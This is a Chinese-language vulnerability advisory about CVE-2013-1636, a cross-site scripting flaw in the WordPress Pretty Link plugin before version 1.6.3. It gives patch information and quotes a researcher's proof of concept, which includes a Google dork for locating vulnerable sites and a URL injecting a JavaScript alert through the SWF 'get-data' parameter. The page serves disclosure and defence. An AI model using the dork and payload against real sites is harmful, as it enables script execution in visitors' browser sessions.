安全研究
安全漏洞
WordPress Pretty Link 插件跨站脚本漏洞(CVE-2013-1636)
发布日期:2013-02-20
更新日期:2013-02-22
受影响系统:
WordPress Pretty Link Lite 1.x描述:
BUGTRAQ ID: 58072
CVE(CAN) ID: CVE-2013-1636
Pretty Link Lite是为您网站创建短链接的插件,可以将外部的链接映射到这些短链接,并且可以跟踪链接的每一次点击,而且提供详细的报告,包括来访者ip、来访者使用的浏览器、操作系统等。
Pretty Link 1.6.3之前版本没有在正确验证wp-content/plugins/pretty-link/includes/version-2-kvasir/open-flash-chart.swf的"get-data" GET参数值,可被利用在用户浏览器会话中执行任意HTML和脚本代码。
<*来源:hip [Insight-Labs]
链接:http://secunia.com/advisories/52246/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# Exploit Title: Wordpress pretty-link‏ plugin XSS in SWF
# Release Date: 20/02/13
# Author: hip [Insight-Labs]
# Contact: hip@insight-labs.org | Website: http://insight-labs.org
# Software Link: http://downloads.wordpress.org/plugin/pretty-link.1.6.3.zip
# Vendor Homepage: http://prettylinkpro.com/
# Tested on: XPsp3
# Affected version: 1.6.3 before
# Google Dork: inurl:/wp-content/plugins/pretty-link/
# REF:CVE-2013-1636
-----------------------------------------------------------------------------------------------------------------------
# Introduction:
Pretty-link is Shrink, beautify, track, manage and share any URL on or off of your WordPress website. Create links that look how you want using your own domain name!
-------------------------------------------------------------------------------------------------------------------------
# XSS - Proof Of Concept:
vulnerable path:
/wp-content/plugins/pretty-link/includes/version-2-kvasir/open-flash-chart.swf
vulnerabile parameter:get-data
POC:
/wp-content/plugins/pretty-link/includes/version-2-kvasir/open-flash-chart.swf?get-data=(function(){alert(xss)})()
-------------------------------------------------------------------------------------------------------------------------
# Patch:
-- Vendor was notified on the 23/01/2013
-- Vendor released version 1.6.3 on 25/01/2013 Fixed the bug
-- REF:http://wordpress.org/extend/plugins/pretty-link/changelog/
-------------------------------------------------------------------------------------------------------------------------
建议:
厂商补丁:
WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://wordpress.org/extend/plugins/pretty-link/changelog/
浏览次数:5189
严重程度:0(网友投票)
绿盟科技给您安全的保障